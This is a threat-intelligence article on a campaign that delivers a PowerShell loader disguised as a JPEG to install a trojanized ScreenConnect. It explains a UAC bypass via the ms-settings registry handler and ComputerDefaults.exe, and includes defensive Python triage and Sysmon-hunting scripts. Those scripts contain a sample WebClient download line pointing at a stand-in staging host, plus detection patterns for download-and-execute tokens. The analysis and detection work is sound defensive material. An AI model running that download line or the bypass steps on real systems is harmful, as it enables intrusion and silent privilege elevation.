Hackers Deploy Trojanized ScreenConnect via Malicious JPEG
A sophisticated new cyberattack campaign, dubbed Operation SilentCanvas, is actively targeting Windows systems. The operation employs a deceptive tactic: it tricks victims into executing a malicious PowerShell script disguised as a harmless JPEG image file. Once deployed, this covert script installs dangerous malware, granting attackers full and silent control over the compromised machine. Security researchers have released a detailed report outlining this threat.
The attack begins when a victim receives what appears to be a routine image file called sysupdate.jpeg through a phishing email, a fake software update prompt, or a deceptive file-sharing link.
Despite carrying a .jpeg extension, the file contains no actual image data. Instead, it holds a PowerShell script engineered to quietly set up a staging environment and pull down additional malicious components from attacker-controlled servers.
Researchers at Cyfirma identified and analyzed the full attack chain, revealing how deep the intrusion goes once the script is executed. The campaign does not rely on a single trick but chains together several well-known techniques to avoid detection and maintain a firm foothold inside targeted environments.
Once the initial file runs, the malware downloads a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool widely used across enterprise networks. The altered version gives attackers a persistent hidden back door while appearing to blend in with trusted software already present on the system.
The threat also gains elevated privileges without triggering any visible security warning. It does this through a fileless technique that manipulates a Windows registry path and abuses a trusted Windows binary to silently bypass the standard User Account Control prompt.
How the Weaponized JPEG Deploys the Malware
The sysupdate.jpeg file lacks the FF D8 FF start-of-image marker that every real JPEG carries; its bytes are PowerShell source text. The .jpeg extension is there to fool the recipient and any mail or web filter that keys on extension rather than content. Windows itself never runs a .jpeg as a script, so the lure has to get the victim (or a one-liner in the fake update prompt) to hand the file's contents to powershell.exe.
The embedded PowerShell code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from legitserver[.]theworkpc[.]com over TCP port 5443.
To avoid antivirus detection, the script reconstructs its command strings at runtime rather than writing them plainly in the file. It also downloads a secondary payload named access.jpeg and runs it directly in memory, so that stage never exists as a file on disk; the compiled launcher described next is the exception and is written to disk.
Microsoft's own .NET compiler, csc.exe (which in turn invokes cvtres.exe), then builds a custom launcher named uds.exe on the victim machine. Because the binary is compiled locally, its hash differs from host to host, which defeats hash- and signature-based scanning; the uds.exe hashes in the IoC table below therefore identify one observed build and should not be the only detection relied upon.
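The mismatch between extension and content is the cheapest place to catch this loader. The script below is an added example (not code from the Cyfirma report or from the campaign) that checks whether a file starting with an image extension actually begins with that format's signature, and whether its bytes contain PowerShell tokens. It generalizes beyond JPEG to PNG, GIF and BMP; the three file contents it inspects are constructed stand-ins, and the staging host in the fake loader is a reserved `.invalid` name.

```python
"""Triage 'image' files whose bytes are really a script.

Added example; not code from the Cyfirma report or from the campaign. A real
JPEG opens with the start-of-image marker FF D8 FF (PNG, GIF and BMP have their
own signatures, checked here too), while a PowerShell loader saved as
sysupdate.jpeg decodes as script text. The file contents below are constructed.
"""
from __future__ import annotations

import re
from pathlib import Path

# Leading bytes each image format must start with.
EXPECTED_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".bmp": b"BM",
}

# PowerShell tokens that have no business inside image data (case-insensitive).
POWERSHELL_MARKERS = re.compile(
    rb"(?i)(New-Object\s+Net\.WebClient|Invoke-Expression|\bIEX\b|DownloadFile|"
    rb"DownloadString|Invoke-WebRequest|Start-Process|New-Item\s+-ItemType|FromBase64String)"
)

# Constructed stand-ins for files on disk: a genuine JPEG header, a loader in
# disguise (shape only, pointing at a reserved .invalid host), and a non-image file.
SAMPLE_FILES = {
    "holiday.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32,
    "sysupdate.jpeg": (
        b"$d = 'C:\\Systems'; New-Item -ItemType Directory -Path $d -Force | Out-Null\r\n"
        b"(New-Object Net.WebClient).DownloadFile('https://staging.example.invalid:5443/pkg', \"$d\\pkg.zip\")\r\n"
    ),
    "notes.txt": b"plain text; wrong extension for this check",
}


def has_expected_magic(name: str, data: bytes) -> bool:
    """True if the file starts with the signature its extension promises."""
    magic = EXPECTED_MAGIC[Path(name).suffix.lower()]
    return data.startswith(magic)


def is_real_jpeg(data: bytes) -> bool:
    """Convenience check for the JPEG case discussed in the article."""
    return data.startswith(EXPECTED_MAGIC[".jpeg"])


def powershell_markers(data: bytes) -> list[str]:
    """Distinct PowerShell tokens found in the bytes, in order of first appearance."""
    seen: dict[str, str] = {}
    for m in POWERSHELL_MARKERS.finditer(data):
        tok = m.group(1).decode("ascii", "replace")
        seen.setdefault(tok.lower(), tok)
    return list(seen.values())


def triage(name: str, data: bytes) -> dict:
    """Classify one file as ok / suspicious / skip and record the evidence."""
    ext = Path(name).suffix.lower()
    if ext not in EXPECTED_MAGIC:
        return {"name": name, "verdict": "skip", "reasons": ["not an image extension"]}
    reasons: list[str] = []
    if not has_expected_magic(name, data):
        reasons.append(f"missing {ext} signature {EXPECTED_MAGIC[ext].hex(' ').upper()}")
    markers = powershell_markers(data)
    if markers:
        reasons.append("PowerShell tokens: " + ", ".join(markers))
    return {"name": name, "verdict": "suspicious" if reasons else "ok", "reasons": reasons}


def triage_all(files: dict[str, bytes]) -> dict[str, dict]:
    """Run triage over a name -> bytes mapping (e.g. a mail attachment dump)."""
    return {name: triage(name, data) for name, data in files.items()}


if __name__ == "__main__":
    for r in triage_all(SAMPLE_FILES).values():
        print(f"{r['name']:>16}: {r['verdict']:<10} {'; '.join(r['reasons'])}")
```

Run against a directory of quarantined attachments by reading each file's first few kilobytes into the mapping; the signature test alone is enough to catch sysupdate.jpeg, and the token scan gives the analyst something to pivot on.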

The multi-stage infection chain shows the end-to-end attack workflow beginning with social engineering and weaponized JPEG delivery, followed by PowerShell payload execution, AMSI bypass, and trojanized ScreenConnect deployment.
After the launcher is in place, the script hijacks the per-user handler for the ms-settings protocol (the HKCU\Software\Classes\ms-settings\Shell\Open\command key with an empty DelegateExecute value, the same path used by the public fodhelper-style bypasses) and points it at uds.exe. It then launches ComputerDefaults.exe, a Microsoft-signed binary that Windows allows to auto-elevate; when that binary resolves the ms-settings handler it runs uds.exe with full administrator rights and no UAC prompt. Two caveats matter for defenders. First, the trick only works when the logged-in user is already a member of the local Administrators group: this is a bypass of the consent prompt, not a privilege escalation from a standard user. Second, although the hijacked key is deleted within about two seconds, registry telemetry such as Sysmon Event ID 13 (value set) and Event ID 12 (key delete) records both the write and the cleanup, so the evidence survives in logs even though it is gone from the live registry.
Post-Compromise Capabilities and Persistence
Once the trojanized ScreenConnect framework is active, the attacker has control equivalent to a hands-on-keyboard session. The modified software supports real-time screen monitoring, video recording, microphone capture, clipboard interception, keystroke logging, and silent file transfers, all carried over an encrypted channel that hides the content from network inspection; the destination domain and IP in the IoC table remain visible and are the network-side detection point.

The hex-level static analysis of the weaponized sysupdate.jpeg payload shows the embedded PowerShell staging logic and malicious infrastructure references.
The malware creates a hidden desktop environment operating out of the logged-in user’s view, allowing the attacker to run tools without detection. A persistent Windows service named OneDriveServers keeps the malware alive across reboots.
A separate component intercepts usernames and passwords at the Windows login screen before they reach the authentication system, and hidden local administrator accounts can be created for long-term access.
Security teams are advised to monitor, and where no development tooling is present block, execution of commonly abused Windows binaries including csc.exe, cvtres.exe, and ComputerDefaults.exe. Because csc.exe is used legitimately by developer workstations and by PowerShell's own Add-Type, a parent-child rule (csc.exe spawned by powershell.exe, or ComputerDefaults.exe spawning anything outside C:\Windows) produces far fewer false positives than an outright block. Organizations should enforce strict controls over remote access platforms, including an allowlist of approved ScreenConnect instances, deploy detection rules for suspicious PowerShell behavior, and isolate any system showing unexpected ScreenConnect activity. Credential resets for all privileged accounts are strongly recommended following any suspected exposure, since the login-screen interception component captures passwords before they are hashed.
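The UAC bypass chain described above and the monitoring advice in this section reduce to a handful of correlations over endpoint telemetry. The script below is an added example (not code from the Cyfirma report or from any vendor product) that runs those correlations over constructed, Sysmon-shaped events: Event ID 1 (process create), 12 (registry key create/delete) and 13 (registry value set) are real Sysmon IDs, but every path, PID, SID and timestamp in the sample is invented for illustration; `C:\Systems\uds.exe` and `ComputerDefaults.exe` are the names the article gives. The sample also includes a benign MSBuild compilation to show that the csc.exe rule keys on the parent process rather than on csc.exe alone.

```python
"""Hunt for the SilentCanvas-style UAC bypass and LOLBin chain in endpoint telemetry.

Added example; not code from the Cyfirma report or any vendor product. Events are
constructed, Sysmon-shaped records (EID 1 = process create, 12 = registry key
create/delete, 13 = registry value set). Field names follow Sysmon's; all values
are invented except the article's C:\\Systems\\uds.exe and ComputerDefaults.exe.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

MS_SETTINGS_COMMAND = r"\software\classes\ms-settings\shell\open\command"
AUTO_ELEVATE_LOLBINS = {"computerdefaults.exe", "fodhelper.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
WINDOWS_DIR = "c:\\windows\\"


@dataclass
class Event:
    ts: datetime
    eid: int
    image: str              # process performing the action
    pid: int = 0
    parent_image: str = ""  # EID 1
    ppid: int = 0           # EID 1
    command_line: str = ""  # EID 1
    target_object: str = ""  # EID 12/13: registry path
    details: str = ""       # EID 13: value written
    event_type: str = ""    # EID 12: CreateKey / DeleteKey


def leaf(path: str) -> str:
    """Last component of a file or registry path, case preserved."""
    return path.rsplit("\\", 1)[-1]


def detect(events: list[Event], delete_window: timedelta = timedelta(seconds=5)) -> list[str]:
    """Return one alert per suspicious finding, in timestamp order."""
    alerts: list[str] = []
    hijack_times: list[datetime] = []
    flagged_csc: set[int] = set()  # pids of csc.exe launched from a shell
    for e in sorted(events, key=lambda x: x.ts):
        stamp = f"{e.ts:%H:%M:%S}"
        target = e.target_object.lower()
        if e.eid == 13 and MS_SETTINGS_COMMAND in target:
            hijack_times.append(e.ts)
            alerts.append(f"{stamp} ms-settings handler hijack by {leaf(e.image)}: "
                          f"{leaf(e.target_object)} = {e.details!r}")
        elif e.eid == 12 and e.event_type == "DeleteKey" and MS_SETTINGS_COMMAND in target:
            recent = [t for t in hijack_times if timedelta(0) <= e.ts - t <= delete_window]
            if recent:  # cleanup seconds after the write is itself the signal
                gap = (e.ts - recent[-1]).total_seconds()
                alerts.append(f"{stamp} hijack key deleted {gap:.0f}s after being set (anti-forensics)")
        elif e.eid == 1:
            img, parent = leaf(e.image).lower(), leaf(e.parent_image).lower()
            if parent in AUTO_ELEVATE_LOLBINS and not e.image.lower().startswith(WINDOWS_DIR):
                alerts.append(f"{stamp} {parent} spawned non-Windows child {e.image} (UAC bypass)")
            if img == "csc.exe" and parent in SHELLS:
                flagged_csc.add(e.pid)
                alerts.append(f"{stamp} csc.exe launched from {parent}: on-host compilation ({e.command_line})")
            elif img == "cvtres.exe" and e.ppid in flagged_csc:
                # cvtres.exe is csc.exe's normal helper; only interesting under a flagged csc.exe
                alerts.append(f"{stamp} cvtres.exe resource step under shell-launched csc.exe")
    return alerts


# Constructed sample: the article's chain, then a benign developer build that must not alert.
T0 = datetime(2025, 1, 1, 10, 0, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
CD = r"C:\Windows\System32\ComputerDefaults.exe"
KEY = r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Classes\ms-settings\Shell\Open\command"
SAMPLE_EVENTS = [
    Event(T0, 1, PS, 900, r"C:\Windows\explorer.exe", 500, "powershell -w hidden -ep bypass"),
    Event(T0 + timedelta(seconds=3), 1, NET + r"\csc.exe", 1234, PS, 900,
          r"csc.exe /noconfig /out:C:\Systems\uds.exe launcher.cs"),
    Event(T0 + timedelta(seconds=4), 1, NET + r"\cvtres.exe", 1240, NET + r"\csc.exe", 1234),
    Event(T0 + timedelta(seconds=6), 13, PS, 900, target_object=KEY + r"\DelegateExecute"),
    Event(T0 + timedelta(seconds=6), 13, PS, 900, target_object=KEY + r"\(Default)", details=r"C:\Systems\uds.exe"),
    Event(T0 + timedelta(seconds=7), 1, CD, 1300, PS, 900),
    Event(T0 + timedelta(seconds=7), 1, r"C:\Systems\uds.exe", 1310, CD, 1300),
    Event(T0 + timedelta(seconds=8), 12, PS, 900, target_object=KEY, event_type="DeleteKey"),
    Event(T0 + timedelta(minutes=5), 1, NET + r"\csc.exe", 5678,
          r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe", 5600),
    Event(T0 + timedelta(minutes=5, seconds=1), 1, NET + r"\cvtres.exe", 5680, NET + r"\csc.exe", 5678),
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

In production the same rules map onto SIEM queries: EID 13 where TargetObject contains `\ms-settings\Shell\Open\command`, EID 1 where ParentImage ends in `ComputerDefaults.exe` and Image is outside `C:\Windows`, and EID 1 where Image ends in `csc.exe` and ParentImage ends in `powershell.exe`. The deletion rule is the one most teams lack, and it is exactly what turns the attacker's two-second cleanup into an indicator.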
Indicators of Compromise (IoCs):
| Type | Indicator | Description |
|---|---|---|
| IP Address | 45[.]138[.]16[.]64 | Attacker-controlled C2 backend IP address — Block |
| Domain | legitserver[.]theworkpc[.]com | Attacker-controlled C2 domain used for payload delivery and remote sessions — Block |
| SHA256 | 7adffc1c0b3fdcba46e8d0a81203c955976d4ef39893c98d0b2dbfbb8d6a8ec3 | Malicious payload hash — Block |
| SHA256 | ecd5ed16975d556d1d17bc980f248f8a5262bed11df9d9cf999efd9c273c11df | Malicious payload hash — Block |
| SHA256 | cea1d85967d2c456fccecae3a70ff2adfe4c113aacf9d18c35 | Malicious payload hash — Block (as published; 50 hex characters, not a valid SHA-256 length; verify against the Cyfirma report before loading) |
| SHA256 | 906c2ed24ca9b46e4c9f3bb4a65c640795bfc1a56c0b56485b849ccd97027eed7ad9aa78a732a4f | Malicious payload hash — Block (as published; 79 hex characters, not a valid SHA-256 length; verify against the Cyfirma report before loading) |
| SHA256 | ee3d776cdaf82335e4293e19ee313cc35eee49cde9963b96766a8f9c89d44a79 | Malicious payload hash — Block |
| SHA256 | 4d8ac85c5b98c69ba44146df61183e9bf613edd796aa516c3ae73611b7d77c06 | Malicious payload hash — Block |
| MD5 | 7DD05336097E5A833F03A63D3221494F | uds.exe compiled dropper hash — Block |
| SHA256 | A635F0C94C98B658AE799978994F0D0A292567CD97B8A19068A8423D1297652A | uds.exe compiled dropper hash — Block |
| File Name | sysupdate.jpeg | Weaponized PowerShell loader disguised as JPEG |
| File Name | access.jpeg | Secondary obfuscated in-memory payload |
| File Name | uds.exe | On-host compiled malicious launcher binary |
| File Path | C:\Systems | Attacker staging directory created on victim machine |
| File Path | C:\ProgramData\OneDriveServer | Trojanized ScreenConnect deployment directory |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.